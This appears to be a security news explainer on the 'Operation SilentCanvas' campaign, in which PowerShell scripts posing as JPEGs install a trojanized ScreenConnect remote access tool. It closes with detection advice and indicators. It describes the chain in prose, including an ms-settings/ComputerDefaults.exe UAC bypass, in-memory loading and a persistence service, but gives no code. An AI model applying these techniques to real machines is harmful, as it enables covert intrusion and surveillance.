Inside Operation SilentCanvas: When a JPEG Isn’t Really an Image
A harmless-looking file named something like “sysupdate.jpeg” can, in fact, be a PowerShell script designed to hijack your Windows PC. Operation SilentCanvas, uncovered by Cyfirma researchers, turns fake JPEGs into the first stage of a multi-step compromise. These JPEG trojan attacks abuse the trust users place in common image formats. The files lack valid JPEG headers yet can slip past superficial checks that look only at extensions, not real content. Once opened or executed, the script begins building an attack chain that standard Windows malware protection may miss, particularly when tools only scan disk-based files or rely on signature-based detection. This tactic shows why PowerShell script security is now a frontline concern: attackers are no longer relying on obvious .ps1 scripts or executables but are leaning on file spoofing and social engineering to bypass user suspicion and basic defenses.
How Fake JPEGs Deploy Remote Access Trojans and Bypass Windows Security
After a victim interacts with the spoofed JPEG, the hidden PowerShell code silently creates a C:\Systems folder and reaches out over encrypted channels to download a trojanized ScreenConnect package from a remote server via TCP port 5443. It then pulls a secondary “access.jpeg” payload that executes entirely in memory, avoiding many traditional antivirus scans. To gain elevated privileges without alarming the user, the malware hijacks the ms-settings registry key, triggering ComputerDefaults.exe and achieving a stealthy User Account Control bypass before removing the key within two seconds. The result is a deeply embedded remote access trojan with extensive control over the device. This combination of in-memory execution, file spoofing prevention evasion, and abuse of legitimate Windows binaries makes detection difficult for organizations that lack strong behavioral monitoring and strict PowerShell usage controls.
From One PC to Full Surveillance: What Attackers Can Do After Infection
Once the trojanized ScreenConnect payload is installed in C:\ProgramData\OneDriveServer\, your machine effectively turns into a surveillance endpoint. The malware sets up an “OneDriveServers” service to maintain persistence across reboots, granting attackers reliable, ongoing access. Through this remote access trojan foothold, adversaries can monitor your screen activity, record keystrokes, and potentially access your microphone, camera, and clipboard contents. They can also exfiltrate files using encrypted channels, all while blending in with normal system behavior. In enterprise environments, this level of control enables rapid lateral movement as attackers use the compromised host to pivot toward file servers, administrative accounts, and critical applications. Because many organizations legitimately use remote management tools like ScreenConnect, distinguishing malicious from authorized activity becomes challenging without strict access controls and detailed logging.
Why File Spoofing and Phishing Make These Attacks Hard to Spot
Operation SilentCanvas relies heavily on social engineering and file extension spoofing to trick users into launching malware. The malicious JPEG trojan attacks often arrive via phishing emails posing as Social Security Administration notices or urgent software update alerts. Victims see familiar icons and file names, assume they are simple images or updates, and open them without a second thought. Because the files carry .jpeg extensions, many users—and some basic security tools—treat them as low-risk. In reality, the content is PowerShell code, not image data. This mismatch between appearance and behavior undermines casual visual checks and highlights weaknesses in basic file spoofing prevention. For enterprises, a single user fooled by a convincing phishing lure can provide attackers an initial beachhead, from which they can move quickly and quietly across the internal network if monitoring is weak.
Practical Steps to Detect and Block JPEG-Based PowerShell Attacks
Users and security teams can significantly reduce the risk of these Windows malware protection bypasses with a few disciplined measures. First, always verify file properties: right-click suspicious “images,” check their size, type, and details, and avoid opening unexpected attachments that claim to be system updates or government notices. Enforce strict PowerShell script security by enabling script-blocking policies, turning on detailed logging, and alerting on scripts launched from unusual paths or non-script file types. Use application whitelisting to block abuse of high-risk binaries like csc.exe and ComputerDefaults.exe, and tightly control remote support tools such as ScreenConnect. Endpoint protection platforms with behavioral analysis are essential for spotting in-memory payloads and persistence services like “OneDriveServers.” If compromise is suspected, immediately reset stored credentials and scan specifically for C:\Systems and C:\ProgramData\OneDriveServer directories.